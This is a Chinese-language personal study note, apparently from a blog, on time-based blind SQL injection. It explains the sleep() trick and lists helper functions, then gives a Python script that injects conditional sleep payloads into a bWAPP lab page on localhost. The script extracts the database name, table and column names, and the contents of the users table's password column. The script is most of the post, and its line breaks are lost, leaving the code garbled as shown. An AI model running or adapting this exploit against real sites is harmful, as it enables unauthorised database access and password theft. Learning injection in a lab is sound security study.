Web安全（二）SQL注入[三]

vlambda
2020-12-04

Web安全（二）SQL注入[三]

注：本篇文章为个人学习笔记仅供学习交流。

Web安全（二）SQL注入[三]

时间盲注

通过注入特定语句，根据对页面请求的物理反馈，来判断是否注入成功，如：在SQL语句中使用sleep() 函数看加载网页的时间来判断注入点。

适用场景：通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知。

原理

select * from user where id= ‘ ？’

？用户输入，替代为 4’ and sleep(3) -- ‘

实际上执行的SQL语句：

select * from user where id= ‘4’ and sleep(3) -- ‘’

当id=4存在时，休眠3秒

当id=4不存在时，直接返回整条拼接出来的SQL是正确的就执行最后的sleep，前面错误（不存在），sleep(3)不执行。

常用函数

substr(a,b,c)：从b位置开始，截取字符串a的c长度

count()：计算总数

ascii()：返回字符的ASCII码

length()：返回字符串的长度

left(a,b)：从左往右截取字符串a的前b个字符

sleep(n)：将程序暂停n秒

示例

选择时间盲注

Web安全（二）SQL注入[三]

正常输入可看到返回时间为1秒左右，拼接sleep函数看到时间变化了说明存在时间盲注，and前面必须是数据库里的，否则不会执行后面的and后面的命令。

Web安全（二）SQL注入[三]

python脚本

import requestsfrom urllib.parse import quote
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php', 'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'}


def guset_db_len(): len_of_db = 0 print('猜解数据库长度') for i in range(1, 6): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers)
 # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间（也就是时间差）， # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 2.5): print('length of database:', i) len_of_db = i continue return len_of_db

def guest_db_name(len_of_db): name_db = '' char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' print('猜解数据库名称') for i in range(1, len_of_db + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, ord(k)) url = url + quote(title) r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): name_db = name_db + k print('第%s位:%s' % (i, k)) print('name of database:', name_db)

def guest_table_name_len(): len_of_tables = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,' tables_name = '' print('表长度的总和') for i in range(2, 40): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间（也就是时间差）， # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of tables:', i) len_of_tables = i continue print('猜解数据库名称') for i in range(1, len_of_tables + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % ( i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): tables_name = tables_name + k print('第%s位:%s' % (i, k)) print('name of tables:', tables_name)

def guest_name_columns(): len_of_columns = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,' columns_name = '' print('列长度的总和') for i in range(2, 200): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间（也就是时间差）， # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of columns:', i) len_of_columns = i continue print('猜解列名称') for i in range(1, len_of_columns + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % ( i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): columns_name = columns_name + k print('第%s位:%s' % (i, k)) print('name of columns:', columns_name)

def guest_columns_content(): len_columns_content = 0 char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890' columns_content = '' columns_name = 'password' print('列内容长度的总和') for i in range(2, 400): url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % ( columns_name, i) title = quote(title) url = url + title r = requests.get(url, headers=headers) # r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间（也就是时间差）， # 发送第一个数据到收到最后一个数据之间 if (r.elapsed.seconds > 4.5): print('length of columns content:', i) len_columns_content = i continue print('列的内容') for i in range(1, len_columns_content + 1): for k in char_list: k1 = ord(k) url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title=' title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % ( columns_name, i, k1) title = quote(title) url = url + title r = requests.get(url, headers=headers) if (r.elapsed.seconds > 4.5): columns_content = columns_content + k print('第%s位:%s' % (i, k)) print('columns_content:', columns_content)

if __name__ == '__main__': guest_db_name(5) guest_table_name_len() guest_name_columns() guest_columns_content()